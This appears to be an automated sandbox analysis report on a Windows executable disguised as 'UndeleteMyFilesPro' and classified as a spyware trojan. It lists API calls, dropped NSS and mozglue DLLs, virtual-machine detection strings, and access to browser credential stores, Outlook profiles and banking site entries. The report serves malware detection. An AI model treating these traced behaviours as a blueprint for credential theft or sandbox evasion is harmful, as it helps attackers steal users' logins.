Code function: 0_2_0044C100 GetWindowLongW,GetClientRect,InvalidateRect,SetWindowLongW,BeginPaint,EndPaint,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetSysColor,CreateSolidBrush,FillRect,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,ReleaseDC,DefWindowProcW,

0_2_0044C100

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00410C6C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,		0_2_00410C6C
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00414E54 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,GetTickCount,ReleaseCapture,		0_2_00414E54

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0044E1D0: DeviceIoControl,

0_2_0044E1D0

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00418E1A	0_2_00418E1A
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_004190F1	0_2_004190F1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0043801E	0_2_0043801E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0043A2BE	0_2_0043A2BE
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00438562	0_2_00438562
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_004125F4	0_2_004125F4
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042A581	0_2_0042A581
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0041863E	0_2_0041863E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042AA56	0_2_0042AA56
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00438AA6	0_2_00438AA6
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00418B59	0_2_00418B59
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00418B79	0_2_00418B79
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0044EDE0	0_2_0044EDE0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00418E5F	0_2_00418E5F
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042AE2A	0_2_0042AE2A
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0043919E	0_2_0043919E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042B236	0_2_0042B236

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: String function: 0042A2F0 appears 36 times
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: String function: 0042A1E6 appears 59 times

Source: fXg8zgxVTF.exe

Static PE information: invalid certificate

Source: fXg8zgxVTF.exe, 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUndeleteMyFilesPro.exe@ vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe, 00000000.00000002.2396304943.000000006CB42000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe, 00000000.00000002.2396603147.000000006CD35000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe	Binary or memory string: OriginalFilenameUndeleteMyFilesPro.exe@ vs fXg8zgxVTF.exe

Source: fXg8zgxVTF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: fXg8zgxVTF.exe

Binary or memory string: Access DatabasesT*.txt; *.wpd; *.wp; *.wri; *.log; *.text; *.cpp; *.hpp; *.c; *.h; *.cs; *.xml; *.slnZ*.gif; *.bmp; *.jpg; *.png; *.jpeg; *.tif; *.tiff; *.psd; *.wmf; *.emf; *.ai; *.eps; *.icoR*.mp3; *.mpg; *.mpeg; *.mp2; *.avi; *.asf; *.wav; *.ram; *.wma; *.wmv; *.wm; *.mov-*.exe; *.com; *.sys; *.bat; *.pif; *.js; *.vb

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_00454E40 GetVolumeInformationW,GetDiskFreeSpaceExW,__wcsnicmp,CloseHandle,ExitThread,CloseHandle,ExitThread,GetLastError,CloseHandle,ExitThread,ExitThread,

0_2_00454E40

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_00444310 FindResourceW,LoadResource,

0_2_00444310

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QSSGA8L6.htm

Jump to behavior

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Command line argument: 2C

0_2_00433230

Source: fXg8zgxVTF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: fXg8zgxVTF.exe, 00000000.00000003.2273216856.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000003.2272867708.0000000021A5D000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000003.2263408781.0000000021A69000.00000004.00000020.00020000.00000000.sdmp, HDGCGHIJKEGIECBFCBAE.0.dr, AFCBFIJEHDHCBGDGDGCB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: fXg8zgxVTF.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: fXg8zgxVTF.exe

Static file information: File size 9743208 > 1048576

Source: fXg8zgxVTF.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8b8e00

Source: fXg8zgxVTF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\wrk\umfen\Release\UndeleteMyFilesPro.pdb source: fXg8zgxVTF.exe

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_004570F0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_004570F0

Source: fXg8zgxVTF.exe

Static PE information: real checksum: 0x367862 should be: 0x958427

Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042A2BE push ecx; ret		0_2_0042A2D1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0042A335 push ecx; ret		0_2_0042A348

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0040E252 IsIconic,GetWindowPlacement,GetWindowRect,

0_2_0040E252

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: GetCursorPos,Sleep,

0_2_00443540

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

API coverage: 0.3 %

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0041C243 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator,	0_2_0041C243
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00452350 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcpyW,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00452350
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0043E4B0 lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcpyW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindClose,	0_2_0043E4B0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00452640 RegOpenKeyW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrcpyW,lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_00452640
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00452910 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,RegOpenKeyW,RegEnumKeyW,RegCloseKey,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegQueryValueExW,RegCloseKey,DoEnvironmentSubstW,lstrlenW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00452910
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00468BA0 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError,	0_2_00468BA0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00468D60 _DebugHeapAllocator,FindFirstFileW,FindNextFileW,FindClose,GetLastError,	0_2_00468D60
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_0043EEB0 FindFirstFileW,FindClose,	0_2_0043EEB0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	Code function: 0_2_00468FC0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,GetLastError,	0_2_00468FC0

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe

Code function: 0_2_0042CF5F VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

0_2_0042CF5F

Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWmJpE[
Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: FHCAFIDB.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: FHCAFIDB.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: FHCAFIDB.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: FHCAFIDB.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FHCAFIDB.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarer
Source: FHCAFIDB.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: FHCAFIDB.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: FHCAFIDB.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
